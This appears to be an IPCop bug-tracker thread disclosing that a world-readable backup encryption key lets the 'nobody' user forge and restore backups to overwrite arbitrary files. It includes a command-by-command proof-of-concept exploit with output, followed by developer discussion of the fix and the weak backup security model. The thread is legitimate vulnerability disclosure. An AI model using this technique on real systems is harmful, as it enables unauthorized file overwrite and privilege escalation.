The user "nobody" can (over)write arbitrary files by
creating fake backups and restoring them.
Cause:
The key used to encrypt the backup file is world readable:
# ls -al /var/ipcop/backup/
-rw-r--r-- 1 root root 74 2005-02-05 20:30
backup.key
POC:
$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
$ cd /tmp
$ mkdir etc
$ echo hacked > etc/hacked
$ tar cvfz backup.tgz etc/
etc/
etc/hacked
$ /usr/bin/openssl des3 -e -salt -in backup.tgz
-out backup.dat -kfile /var/ipcop/backup/backup.key
$ cp backup.dat /home/httpd/html/backup/ipcop.dat
$ ls -al /etc/hacked
ls: /etc/hacked: No such file or directory
$ /usr/local/bin/ipcoprscfg --hardware
$ ls -al /etc/hacked
-rw-r--r-- 1 nobody nobody 7 2005-10-07 00:05 /etc/hacked
Bingo.
Note: I assumed, that I have a shell as user nobody for
example by exploiting a vulnerable service.
To get this I entered a valid shell for nobody in
/etc/passwd and did a "su - nobody"
FIX: Change access rights on /var/ipcop/backup/backup.key
Logged In: YES
user_id=1041094
Ok backup.key is now '400' protected
But I would like to know why we bother with two kind of
sets. Encrypted and not encrypted....
Logged In: YES
user_id=317036
Maybe you shouldn't close the bug if you ask a question? :p
Encrypted backups can only be restored on the IPCop that
made them (as it has the key). Unencrypted backups can only
be restored on an IPCop that has never made a web backup
(one that has no key). The idea being that if you have to
rebuild your IPCop you can still get a backup onto it.
Trouble is unencrypted web backups totaly break our security
model. I can't see any way to do unencrypted web backup and
restore without allowing nobody -> root privilege
escalation. I'm not actuially convinced the encrypted
backups are any better - without a signature on them it's
still possible an attacker could manipulate an existing backup.
I know gilles has been making some changes here, but I'm not
sure they go anywhere near far enough,.
Logged In: YES
user_id=691649
Now that backup.key access is restricted to root, this point
should be considered closed.
Uncrypted backup is covered by another SF bug report.